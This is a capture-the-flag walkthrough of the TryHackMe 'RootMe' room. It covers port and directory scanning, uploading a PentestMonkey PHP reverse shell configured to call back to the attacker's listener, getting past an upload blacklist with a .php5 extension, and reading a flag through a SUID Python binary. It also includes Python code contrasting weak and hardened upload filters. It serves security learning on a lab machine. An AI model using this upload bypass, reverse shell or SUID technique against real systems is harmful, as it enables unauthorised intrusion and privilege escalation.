THM — RootMe

Beginner’s CTF on TryHackMe

Reconnaissance:

nmap -sV -vv 10.10.x.x

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-29 20:05 BST
NSE: Loaded 42 scripts for scanning.
Initiating ARP Ping Scan at 20:05
Scanning 10.10.x.x [1 port]
Completed ARP Ping Scan at 20:05, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:05
Completed Parallel DNS resolution of 1 host. at 20:05, 0.00s elapsed
Initiating SYN Stealth Scan at 20:05
Scanning ip-10-10-x-x.eu-west-1.compute.internal (10.10.x.x) [1000 ports]
Discovered open port 80/tcp on 10.10.x.x
Discovered open port 22/tcp on 10.10.x.x

Completed SYN Stealth Scan at 20:05, 1.27s elapsed (1000 total ports)
Initiating Service scan at 20:05
Scanning 2 services on ip-10-10-x-x.eu-west-1.compute.internal (10.10.x.x)
Completed Service scan at 20:05, 6.03s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.x.x.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 20:05
Completed NSE at 20:05, 0.02s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 20:05
Completed NSE at 20:05, 0.00s elapsed
Nmap scan report for ip-10-10-x-x.eu-west-1.compute.internal (10.10.x.x)
Host is up, received arp-response (0.0012s latency).
Scanned at 2021-08-29 20:05:05 BST for 8s
Not shown: 998 closed ports
Reason: 998 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.29 ((Ubuntu))

MAC Address: 02:CE:49:01:F0:BF (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds
Raw packets sent: 1002 (44.072KB) | Rcvd: 1002 (40.076KB)

The Nmap scan shows two open ports: SSH on 22 and Apache httpd 2.4.29 on 80. From here we examine the Apache server on port 80.

We can run dirb to try to find directories.

dirb http://10.10.x.x

-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Aug 29 20:05:42 2021
URL_BASE: http://10.10.x.x/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.x.x/ ----
==> DIRECTORY: http://10.10.x.x/css/
+ http://10.10.x.x/index.php (CODE:200|SIZE:616)
==> DIRECTORY: http://10.10.x.x/js/
==> DIRECTORY: http://10.10.x.x/panel/
+ http://10.10.x.x/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://10.10.x.x/uploads/

---- Entering directory: http://10.10.x.x/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.x.x/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.x.x/panel/ ----
+ http://10.10.x.x/panel/index.php (CODE:200|SIZE:732)

---- Entering directory: http://10.10.x.x/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Aug 29 20:05:49 2021
DOWNLOADED: 9224 - FOUND: 3

We find two directories of interest to explore: /panel/ and /uploads/ (which dirb reports as listable).

Getting a Shell:

We use the PHP reverse shell from PenTest Monkey and change its $ip and $port parameters to point back to our machine.

$ip = '10.x.x.x';  // CHANGE THIS
$port = 3033;       // CHANGE THIS

Our first attempt to upload the shell is rejected with an error. Renaming the file with a .php5 extension gets it uploaded successfully, so the filter evidently rejects only the .php extension itself. Before executing the payload we start a listener on port 3033, which receives the connection once the code runs. In /uploads/ we see our payload; clicking it executes the code and our listener receives the shell.

nc -lvnp 3033 
Listening on [0.0.0.0] (family 0, port 3033)
Connection from 10.10.x.x 33822 received!
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

Once connected, we search for the flag and view its contents:

find / -name 'user.txt' 2>/dev/null
/var/www/user.txt
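The .php5 bypass above works because the panel's check names the extensions it rejects rather than the ones it accepts. As an added example in Python (my own code, not the room's PHP panel), here is a blacklist check of that kind beside an allowlist check that also verifies the file's magic bytes and discards the client's filename; the function names and sample inputs are my assumptions.

```python
import os
import secrets

# Weak form, modelled on what the room's panel apparently does: a blacklist that
# rejects only ".php" (the writeup shows ".php5" going through and executing).
BLOCKED_EXTENSIONS = {".php"}

# Hardened form: an allowlist of image extensions, each tied to the magic bytes
# the file content must start with. Anything else is refused. Defence in depth
# is still to disable script execution under /uploads/ (e.g. php_admin_flag
# engine off in the Apache directory config) so a stray upload cannot run.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def weak_filter_allows(filename: str) -> bool:
    """Blacklist check: only the literal '.php' is refused, so '.php5' and
    case variants such as '.PHP' are accepted."""
    _, ext = os.path.splitext(filename)
    return ext not in BLOCKED_EXTENSIONS


def hardened_filter_allows(filename: str, content: bytes) -> bool:
    """Allowlist check: exactly one extension, lowercased, taken from
    ALLOWED_TYPES, and the body must carry that type's magic bytes."""
    base = os.path.basename(filename)
    if base.count(".") != 1:           # refuses "shell.php.jpg" double extensions
        return False
    ext = os.path.splitext(base)[1].lower()
    magic = ALLOWED_TYPES.get(ext)
    return magic is not None and content.startswith(magic)


def stored_name(filename: str) -> str:
    """Never reuse the client-supplied name: store under a random name with the
    validated extension so the uploaded file's URL cannot be predicted."""
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext
```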

Privilege Escalation:

We search the filesystem for SUID binaries:

find / -perm -u=s -type f 2>/dev/null

We find an interesting file, /usr/bin/python, with the SUID bit set. We attempted the SUID shell technique but it didn't work out, so we used the file-read technique instead to view our file.

Knowing that we can abuse the SUID python binary, we use the GTFOBins "file read" one-liner for Python to view the flag:

python -c 'print(open("/path/to/file").read())'
